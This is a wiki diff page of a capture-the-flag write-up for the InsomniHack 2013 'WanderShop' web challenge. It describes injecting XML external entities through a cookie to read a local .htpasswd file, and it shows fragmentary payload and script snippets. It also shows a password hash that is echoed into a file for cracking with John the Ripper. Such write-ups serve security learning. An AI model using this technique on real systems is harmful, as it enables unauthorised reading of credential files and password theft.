Changes

Jump to: navigation, search

InsomniHack-2013/Web2/WanderShop

116 bytes added, 11:05, 26 March 2013
</pre>
* We can then inject XML with the cookie, we use [https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing XML external entities] which allow to manipulate local files and display the result in the XML
<presyntaxhighlight lang="xml">
<!DOCTYPE basket
[
<item type="5" name="asd">&item;</item>
</basket>
</presyntaxhighlight>
* The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
* Here's the HTML result
<presyntaxhighlight lang="html4strict">
<!DOCTYPE html>
<html lang="en">
</body>
</html>
</presyntaxhighlight>
* The password is in CRYPT format, which is easily bruteforced with john the ripper
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
* Complete script
<presyntaxhighlight lang="python">
#!/usr/bin/env python
r = requests.get(url + 'checkout.php', cookies=cookie)
print r.content
</presyntaxhighlight>
== See also ==
* [[InsomniHack-2013]]
Rorist
ControlGroup, administrator
4,205
edits
Retrieved from "https://fixme.ch/wiki/Special:MobileDiff/4134"